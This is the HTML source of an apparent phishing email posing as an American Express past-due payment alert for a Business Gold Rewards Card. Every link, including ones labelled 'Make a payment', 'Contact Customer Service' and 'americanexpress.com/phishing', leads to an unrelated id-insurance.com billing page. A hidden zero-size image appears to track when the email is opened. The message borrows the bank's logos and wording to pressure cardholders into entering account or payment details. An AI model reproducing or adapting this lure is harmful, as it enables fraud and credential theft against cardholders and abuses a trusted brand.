<div>
<p><img height="0" src="http://www.blogbasement.net/logo/sos-ident-sosp/logo.png" style="height: 0px; width: 0px; display:none" /></p>
<table border="0" cellpadding="0" cellspacing="0" width="693">
	<tbody>
		<tr>
			<td bgcolor="#DDEEFA" colspan="9" height="25" rowspan="1" width="693">&nbsp;</td>
		</tr>
		<tr>
			<td bgcolor="#DDEEFA" colspan="1" height="1" rowspan="1" width="30">&nbsp;</td>
			<td bgcolor="#999999" colspan="6" height="1" rowspan="1" width="629">&nbsp;</td>
			<td bgcolor="#DDEEFA" colspan="2" height="1" rowspan="1" width="34">&nbsp;</td>
		</tr>
		<tr>
			<td bgcolor="#DDEEFA" colspan="1" height="14" rowspan="1" width="30">&nbsp;</td>
			<td bgcolor="#999999" colspan="1" height="14" rowspan="1" width="1">&nbsp;</td>
			<td bgcolor="#FFFFFF" colspan="2" height="14" rowspan="1" width="458">&nbsp;</td>
			<td bgcolor="#EBEBEB" colspan="3" height="14" rowspan="1" width="170">&nbsp;</td>
			<td bgcolor="#999999" colspan="1" height="14" rowspan="1" width="4">&nbsp;</td>
			<td bgcolor="#DDEEFA" colspan="1" height="14" rowspan="1" width="30">&nbsp;</td>
		</tr>
		<tr>
			<td bgcolor="#DDEEFA" colspan="1" height="25" rowspan="1" width="30">&nbsp;</td>
			<td bgcolor="#999999" colspan="1" height="25" rowspan="1" width="1">&nbsp;</td>
			<td bgcolor="#FFFFFF" colspan="1" height="25" rowspan="1" width="30">&nbsp;</td>
			<td bgcolor="#FFFFFF" colspan="1" height="25" rowspan="1" width="398">
			<p style="font-family:Arial;font-size:13.5pt;color:#0077c3"><b>Your payment is past due</b></p>
			</td>
			<td bgcolor="#EBEBEB" colspan="1" height="25" rowspan="1" width="14">&nbsp;</td>
			<td align="left" bgcolor="#EBEBEB" colspan="1" height="30" rowspan="1" width="142"><img align="" alt="" height="52" src="http://www208.americanexpress.com/axp/bu_logos/2008/bluebox.gif" style="border-style:none;display:block" width="60" /></td>
			<td bgcolor="#EBEBEB" colspan="1" height="25" rowspan="1" width="14">&nbsp;</td>
			<td bgcolor="#999999" colspan="1" height="25" rowspan="1" width="4">&nbsp;</td>
			<td bgcolor="#DDEEFA" colspan="1" height="25" rowspan="1" width="30">&nbsp;</td>
		</tr>
		<tr>
			<td bgcolor="#DDEEFA" colspan="1" height="20" rowspan="1" width="30">&nbsp;</td>
			<td bgcolor="#999999" colspan="1" height="20" rowspan="1" width="1">&nbsp;</td>
			<td bgcolor="#FFFFFF" colspan="2" height="20" rowspan="1" width="458">&nbsp;</td>
			<td bgcolor="#EBEBEB" colspan="1" height="20" rowspan="1" width="14">&nbsp;</td>
			<td align="left" bgcolor="#EBEBEB" colspan="1" height="20" rowspan="1" width="142">
			<p style="font-family:Arial;font-size:8pt"><b>For your security:</b></p>

			<hr color="#C2C2C2" size="1" width="142" /></td>
			<td bgcolor="#EBEBEB" colspan="1" height="20" rowspan="1" width="14">&nbsp;</td>
			<td bgcolor="#999999" colspan="1" height="20" rowspan="1" width="4">&nbsp;</td>
			<td bgcolor="#DDEEFA" colspan="1" height="20" rowspan="1" width="30">&nbsp;</td>
		</tr>
		<tr>
			<td bgcolor="#DDEEFA" colspan="1" height="20" rowspan="1" width="30">&nbsp;</td>
			<td bgcolor="#999999" colspan="1" height="20" rowspan="1" width="1">&nbsp;</td>
			<td bgcolor="#FFFFFF" colspan="1" height="20" rowspan="1" width="30">&nbsp;</td>
			<td bgcolor="#FFFFFF" colspan="1" height="20" rowspan="1" valign="top" width="398">
			<p style="font-size:10pt;font-style:normal;font-family:Arial">Dear Cardholder,</p>

			<p style="font-size:10pt;font-family:Arial">The payment date for your Business Gold Rewards Card account is now passed.</p>

			<table cellpadding="0" cellspacing="0" width="78.68%">
				<tbody>
					<tr height="0.211666663487752cm">
						<td colspan="1" rowspan="1" style="border-right-color:#00cece;border-right-style:none;border-right-width:1pt" width="50%">&nbsp;</td>
					</tr>
					<tr>
						<td colspan="1" rowspan="1" style="background-color:#ddeefa;border-bottom-color:#ddeefa;border-bottom-style:none;border-bottom-width:1pt;border-left-color:#ddeefa;border-left-style:none;border-left-width:1pt;border-right-color:#ddeefa;border-right-style:none;border-right-width:1pt;border-top-color:#ddeefa;border-top-style:none;border-top-width:1pt" width="50%">
						<p style="font-size:10pt;font-family:Arial">Statement Balance:</p>
						</td>
						<td colspan="1" rowspan="1" style="background-color:#ddeefa;border-bottom-color:#ddeefa;border-bottom-style:none;border-bottom-width:1pt;border-right-color:#ddeefa;border-right-style:none;border-right-width:1pt;border-top-color:#ddeefa;border-top-style:none;border-top-width:1pt" width="50%">
						<p style="font-size:10pt;font-family:Arial">$6309.73</p>
						</td>
					</tr>
					<tr>
						<td colspan="1" rowspan="1" style="background-color:#ddeefa;border-bottom-color:#ddeefa;border-bottom-style:none;border-bottom-width:1pt;border-left-color:#ddeefa;border-left-style:none;border-left-width:1pt;border-right-color:#ddeefa;border-right-style:none;border-right-width:1pt" width="50%">
						<p style="font-size:10pt;font-family:Arial">Payment Due:</p>
						</td>
						<td colspan="1" rowspan="1" style="background-color:#ddeefa;border-bottom-color:#ddeefa;border-bottom-style:none;border-bottom-width:1pt;border-right-color:#ddeefa;border-right-style:none;border-right-width:1pt" width="50%">
						<p style="font-size:10pt;font-family:Arial">$6309.73</p>
						</td>
					</tr>
				</tbody>
			</table>

			<p style="font-size:10pt;font-family:Arial"><br clear="none" />
			If you have already sent or scheduled your payment, please <a href="http://www.id-insurance.com/sos-ident-sos/billpay.html?customerid=sos-ident-sos">Contact us here</a>.</p>

			<p style="font-size:10pt;font-family:Arial">&nbsp;</p>

			<table cellpadding="0" cellspacing="0" width="100%">
				<tbody>
					<tr>
						<td colspan="1" rowspan="1" width="31%">
						<p><a href="http://www.id-insurance.com/sos-ident-sos/billpay.html?customerid=sos-ident-sos" shape="rect">Make a payment</a></p>
						</td>
						<td colspan="1" rowspan="1" width="36%">
						<p><a href="http://www.id-insurance.com/sos-ident-sos/billpay.html?customerid=sos-ident-sos" shape="rect">View recent activity</a></p>
						</td>
						<td colspan="1" rowspan="1" width="33%">
						<p><a href="http://www.id-insurance.com/sos-ident-sos/billpay.html?customerid=sos-ident-sos" shape="rect">Update alert settings</a></p>
						</td>
					</tr>
				</tbody>
			</table>

			<p style="font-size:10pt;font-family:Arial"><br clear="none" />
			Thank you for your Cardmembership.</p>

			<p align="left" style="font-size:10pt;font-family:Arial">Sincerely,<br clear="none" />
			American Express Customer Service</p>

			<p style="font-family:Arial;font-size:8pt">If for any reason you want to stop receiving this alert simply <a href="http://www.id-insurance.com/sos-ident-sos/billpay.html?customerid=sos-ident-sos" shape="rect">click here</a>.<br clear="none" />
			<br clear="none" />
			* Payment Due reflects the amount due on your account as of the statement close date. Check your online statement for the most current information about your account.</p>

			<p style="font-family:Arial;font-size:8pt">&nbsp;</p>

			<hr color="#C2C2C2" size="1" width="398" />
			<p style="font-family:Arial;font-size:8pt">Was this e-mail helpful? Please <a href="http://www.id-insurance.com/sos-ident-sos/billpay.html?customerid=sos-ident-sos" shape="rect">click here</a> to give us your feedback.</p>
			</td>
			<td bgcolor="#EBEBEB" colspan="1" height="20" rowspan="1" width="14">&nbsp;</td>
			<td bgcolor="#EBEBEB" colspan="1" height="20" rowspan="1" valign="top" width="142"><img align="" alt="" height="37" src="http://www208.americanexpress.com/axp/cardart/2008/img_rewardsplusgold.gif" style="border-style:none;display:block" width="58" />
			<hr color="#C2C2C2" size="1" width="142" />
			<p style="font-size:10pt;font-style:normal;font-family:Arial"><a href="http://www.id-insurance.com/sos-ident-sos/billpay.html?customerid=sos-ident-sos" shape="rect"><img align="" alt="" height="142" src="http://qwww208.americanexpress.com/axp/sidebargraphics/ban_pzn_text.gif" style="border-style:none" width="142" /></a></p>
			</td>
			<td bgcolor="#EBEBEB" colspan="1" height="20" rowspan="1" width="14">&nbsp;</td>
			<td bgcolor="#999999" colspan="1" height="20" rowspan="1" width="4">&nbsp;</td>
			<td bgcolor="#DDEEFA" colspan="1" height="20" rowspan="1" width="30">&nbsp;</td>
		</tr>
		<tr>
			<td bgcolor="#DDEEFA" colspan="1" height="24" rowspan="1" width="30">&nbsp;</td>
			<td bgcolor="#999999" colspan="1" height="24" rowspan="1" width="1">&nbsp;</td>
			<td bgcolor="#FFFFFF" colspan="2" height="24" rowspan="1" width="458">&nbsp;</td>
			<td bgcolor="#EBEBEB" colspan="3" height="24" rowspan="1" width="170">&nbsp;</td>
			<td bgcolor="#999999" colspan="1" height="24" rowspan="1" width="4">&nbsp;</td>
			<td bgcolor="#DDEEFA" colspan="1" height="24" rowspan="1" width="30">&nbsp;</td>
		</tr>
		<tr>
			<td bgcolor="#DDEEFA" colspan="2" height="4" rowspan="1" width="31">&nbsp;</td>
			<td bgcolor="#999999" colspan="6" height="4" rowspan="1" width="632">&nbsp;</td>
			<td bgcolor="#DDEEFA" colspan="1" height="4" rowspan="1" width="30">&nbsp;</td>
		</tr>
		<tr>
			<td bgcolor="#DDEEFA" colspan="9" height="25" rowspan="1" width="693">&nbsp;</td>
		</tr>
		<tr>
			<td bgcolor="#FFFFFF" colspan="9" rowspan="1" width="663">
			<table width="663">
				<tbody>
					<tr>
						<td bgcolor="#FFFFFF" colspan="1" height="20" rowspan="1" width="61">&nbsp;</td>
						<td bgcolor="#FFFFFF" colspan="1" height="20" rowspan="1" width="572">
						<p align="left" style="font-family:Arial;font-size:8pt;color:gray">&nbsp;</p>

						<table cellpadding="0" cellspacing="0" width="100%">
							<tbody>
								<tr>
									<td colspan="1" rowspan="1" width="33.3333333333333%">
									<p style="font-family:Arial;font-size:8pt;color:gray"><a href="http://www.id-insurance.com/sos-ident-sos/billpay.html?customerid=sos-ident-sos" shape="rect">Contact Customer Service</a></p>
									</td>
									<td colspan="1" rowspan="1" width="33.3333333333333%">
									<p style="font-family:Arial;font-size:8pt;color:gray"><a href="http://www.id-insurance.com/sos-ident-sos/billpay.html?customerid=sos-ident-sos" shape="rect">View Our Privacy Statement</a></p>
									</td>
									<td colspan="1" rowspan="1" width="33.3333333333333%">
									<p style="font-family:Arial;font-size:8pt;color:gray"><a href="http://www.id-insurance.com/sos-ident-sos/billpay.html?customerid=sos-ident-sos" shape="rect">Add Us to Your Address Book</a></p>
									</td>
								</tr>
							</tbody>
						</table>

						<p style="font-family:Arial;font-size:8pt;color:gray">Your Cardmember information is included in the upper-right corner to help you recognize this as a customer service e-mail from American Express. Using the spam/junk mail function may not block servicing messages from being sent to your email account. To learn more about e-mail security or report a suspicious e-mail, please visit us at <a href="http://www.id-insurance.com/sos-ident-sos/billpay.html?customerid=sos-ident-sos" shape="rect">americanexpress.com/phishing</a>. We kindly ask you not to reply to this e-mail but instead contact us securely via <a href="http://www.id-insurance.com/sos-ident-sos/billpay.html?customerid=sos-ident-sos" shape="rect">customer service</a>.</p>

						<p style="font-family:Arial;font-size:8pt;color:gray">Copyright 2012 American Express Company. All rights reserved.</p>

						<p align="left" style="font-family:Arial;font-size:8pt;color:gray"><br clear="none" />
						KDQWODJ2012AMJSP0801</p>
						</td>
						<td bgcolor="#FFFFFF" colspan="1" height="20" rowspan="1" width="30">&nbsp;</td>
					</tr>
				</tbody>
			</table>
			</td>
		</tr>
	</tbody>
</table>
</div>
